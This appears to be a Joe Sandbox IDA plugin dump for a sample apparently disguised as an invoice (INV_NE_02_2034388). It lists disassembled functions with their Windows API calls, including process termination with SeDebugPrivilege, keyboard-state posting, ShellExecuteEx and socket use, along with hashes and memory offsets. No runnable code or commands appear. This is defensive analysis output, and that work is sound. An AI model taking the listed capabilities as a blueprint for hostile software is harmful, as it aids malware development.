                                          • Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68
                                          APIs
                                            • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
                                            • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
                                            • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
                                          • GetLastError.KERNEL32 ref: 0047E9B7
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
                                          • GetLastError.KERNEL32(00000000), ref: 0047EA6E
                                          • CloseHandle.KERNEL32(00000000), ref: 0047EAA3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                          • String ID: SeDebugPrivilege
                                          • API String ID: 2533919879-2896544425
                                          • Opcode ID: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                          • Instruction ID: ee7027a858fb35c2998370541a0cb7821fbd3e1ab4d9769570fd7f32c35e06b7
                                          • Opcode Fuzzy Hash: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                          • Instruction Fuzzy Hash: E1419D712002009FDB10EF25DC95BAEB7A5AF44318F04856EF9069B3C2DB78AC09CB99
                                          APIs
                                          • LoadIconW.USER32(00000000,00007F03), ref: 00463033
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: IconLoad
                                          • String ID: blank$info$question$stop$warning
                                          • API String ID: 2457776203-404129466
                                          • Opcode ID: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                          • Instruction ID: 1734436af2ca56e59899cd3bdf017f39c547290e8d4403808a282f24c331c6a5
                                          • Opcode Fuzzy Hash: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                          • Instruction Fuzzy Hash: F211F631348386BAE7249E55DC42DAF679C9F15365B20002FF90066281FAFC5E4956AE
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
                                          • LoadStringW.USER32(00000000), ref: 00464319
                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
                                          • LoadStringW.USER32(00000000), ref: 00464336
                                          • _wprintf.LIBCMT ref: 0046435C
                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A
                                          Strings
                                          • %s (%d) : ==> %s: %s %s, xrefs: 00464357
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString$Message_wprintf
                                          • String ID: %s (%d) : ==> %s: %s %s
                                          • API String ID: 3648134473-3128320259
                                          • Opcode ID: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                          • Instruction ID: 8e316eae760c98dab52acacd6546c6ae495e9062239688ff7a3f09ebd5f77a5e
                                          • Opcode Fuzzy Hash: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                          • Instruction Fuzzy Hash: CB0167F2900208BFD751AB90DD89EFB776CEB08301F5009B6BB45E2151FA785E894B79
                                          APIs
                                            • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                          • GetSystemMetrics.USER32(0000000F), ref: 0048D47C
                                          • GetSystemMetrics.USER32(0000000F), ref: 0048D49C
                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
                                          • ShowWindow.USER32(00000003,00000000), ref: 0048D735
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                          • String ID:
                                          • API String ID: 1211466189-0
                                          • Opcode ID: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                          • Instruction ID: 2f618d94a1d43a989375790be64f9a6bb81cc316bd664b93e4dd4f842dd9a18d
                                          • Opcode Fuzzy Hash: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                          • Instruction Fuzzy Hash: 2EB1AE71901219EFDF14EF68C9857AE7BB1BF04701F08847AEC48AB295E738A950CB54
                                          APIs
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          • Opcode ID: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                          • Instruction ID: 9bc26204a44dec3219c5fdbddb2daa96843464872a345c1f9b74dd9d2987fb79
                                          • Opcode Fuzzy Hash: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                          • Instruction Fuzzy Hash: 514111307046809ADF755B298ECCB6F7791AB45304F14887FE047B26E0CABDA846DB2D
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD
                                            • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                            • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
                                          • EnterCriticalSection.KERNEL32(?), ref: 00467130
                                          • _memmove.LIBCMT ref: 0046717E
                                          • _memmove.LIBCMT ref: 0046719B
                                          • LeaveCriticalSection.KERNEL32(?), ref: 004671AA
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 256516436-0
                                          • Opcode ID: 5cc59522dc711bf3fe243e6e1917aced79d968ecf744907e001d73688ca29e76
                                          • Instruction ID: 188a4d0b29229593a2b146342a062b1bd5409cf6fda6c026f11dbcde1a99e618
                                          • Opcode Fuzzy Hash: 5cc59522dc711bf3fe243e6e1917aced79d968ecf744907e001d73688ca29e76
                                          • Instruction Fuzzy Hash: F131A131A00215EBCF00DFA5DC85AAFB7B8EF45714F1441BAF9049B246EB349E14CBA9
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 004861EB
                                          • GetDC.USER32(00000000), ref: 004861F3
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
                                          • ReleaseDC.USER32(00000000,00000000), ref: 0048620A
                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                          • String ID:
                                          • API String ID: 3864802216-0
                                          • Opcode ID: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                          • Instruction ID: f4278305449edce2f76c410d332ec57268d6ee35a6a277c822a0a6189647fcfb
                                          • Opcode Fuzzy Hash: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                          • Instruction Fuzzy Hash: 46317172101210BFEB115F50DC4AFEB3BADEF49755F0540A9FE08AA291D6759C41CB68
                                          APIs
                                            • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                            • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                            • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                          • _wcstok.LIBCMT ref: 0046EC94
                                          • _wcscpy.LIBCMT ref: 0046ED23
                                          • _memset.LIBCMT ref: 0046ED56
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                          • String ID: X
                                          • API String ID: 774024439-3081909835
                                          • Opcode ID: d6e1d5704a763b65c75ff422fc9549e5ef5795b94331fb4464b83197f6882e3a
                                          • Instruction ID: da02439699827519884de0a837ef4d7055a253f99ddb834d536b4edba3b8eab3
                                          • Opcode Fuzzy Hash: d6e1d5704a763b65c75ff422fc9549e5ef5795b94331fb4464b83197f6882e3a
                                          • Instruction Fuzzy Hash: E1C161756083019FD714EF25D841A5AB7E4FF85318F10492EF899A72A2EB38EC45CB4B
                                          APIs
                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00476C00
                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476C21
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00476C34
                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 00476CEA
                                          • inet_ntoa.WSOCK32(?), ref: 00476CA7
                                            • Part of subcall function 0045A7E9: _strlen.LIBCMT ref: 0045A7F3
                                            • Part of subcall function 0045A7E9: _memmove.LIBCMT ref: 0045A815
                                          • _strlen.LIBCMT ref: 00476D44
                                          • _memmove.LIBCMT ref: 00476DAD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                          • String ID:
                                          • API String ID: 3619996494-0
                                          • Opcode ID: b26197013ca06bdf935ebb7fa7d10b0a6269670c8655181fb272f8dd91729564
                                          • Instruction ID: ed0775ecea4f9d6c11d03e52ad69743ddbee2f845c96f8b55ead14f2c665c5c3
                                          • Opcode Fuzzy Hash: b26197013ca06bdf935ebb7fa7d10b0a6269670c8655181fb272f8dd91729564
                                          • Instruction Fuzzy Hash: 3081E971204700AFC710EB25CC81EABB7A9EF84718F10892EF559A72D2DB78ED05CB59
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                          • Instruction ID: a887e684d243743618d1057532b585a7ad503945d0d011121e70032f0d2e3d72
                                          • Opcode Fuzzy Hash: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                          • Instruction Fuzzy Hash: 85715F30900109EFDB04DF95CC89EBF7B75FF85314F14816AF915AA2A1C738AA51CBA9
                                          APIs
                                          • IsWindow.USER32(00C711A8), ref: 0048B3EB
                                          • IsWindowEnabled.USER32(00C711A8), ref: 0048B3F7
                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
                                          • SendMessageW.USER32(00C711A8,000000B0,?,?), ref: 0048B512
                                          • IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
                                          • GetWindowLongW.USER32(00C711A8,000000EC), ref: 0048B571
                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                          • String ID:
                                          • API String ID: 4072528602-0
                                          • Opcode ID: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                          • Instruction ID: 3cfba568ea5790526d5b286793119b4d477072028a14d6832b16bbf893ccb4d1
                                          • Opcode Fuzzy Hash: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                          • Instruction Fuzzy Hash: 9B71BF34601604EFDB21AF54CC95FBF7BA9EF09700F14486EE941973A2C739A891DB98
                                          APIs
                                          • _memset.LIBCMT ref: 0047F448
                                          • _memset.LIBCMT ref: 0047F511
                                          • ShellExecuteExW.SHELL32(?), ref: 0047F556
                                            • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                            • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                            • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                          • GetProcessId.KERNEL32(00000000), ref: 0047F5CD
                                          • CloseHandle.KERNEL32(00000000), ref: 0047F5FC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                          • String ID: @
                                          • API String ID: 3522835683-2766056989
                                          • Opcode ID: bc3d410e87ac89b06d51cd0e3322e6ce41cf3a0caf3fdd3db083c5eeea97c555
                                          • Instruction ID: 5c1dd39b7f321ddcc7bcc10d078eb251a602d9f768a890d439a18523313ae713
                                          • Opcode Fuzzy Hash: bc3d410e87ac89b06d51cd0e3322e6ce41cf3a0caf3fdd3db083c5eeea97c555
                                          • Instruction Fuzzy Hash: 3B61B1B1A006189FCB04EF55C48099EB7F5FF48314F14846EE819BB392CB38AD45CB88
                                          APIs
                                          • GetParent.USER32(?), ref: 00460F8C
                                          • GetKeyboardState.USER32(?), ref: 00460FA1
                                          • SetKeyboardState.USER32(?), ref: 00461002
                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                          • Instruction ID: d8e1dc28bdc088eb6cbc7413f3b60f262c6bc769533ec748a7a92d83500406ea
                                          • Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                          • Instruction Fuzzy Hash: 5F51D1A05046D53DFB3642348C15BBBBEA95B06304F0C898EE1D4959E3E2DDDCC8D75A
                                          APIs
                                          • GetParent.USER32(00000000), ref: 00460DA5
                                          • GetKeyboardState.USER32(?), ref: 00460DBA
                                          • SetKeyboardState.USER32(?), ref: 00460E1B
                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                          • Instruction ID: 69172e86244207f9b898dfa665998bef84c2b13c00b7e8d8db4e4b2c62b94f0a
                                          • Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                          • Instruction Fuzzy Hash: 035136A05447D53DFB368334CC41B7B7FA95B06300F08898EE1D4569C2E39AAC88D35A
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
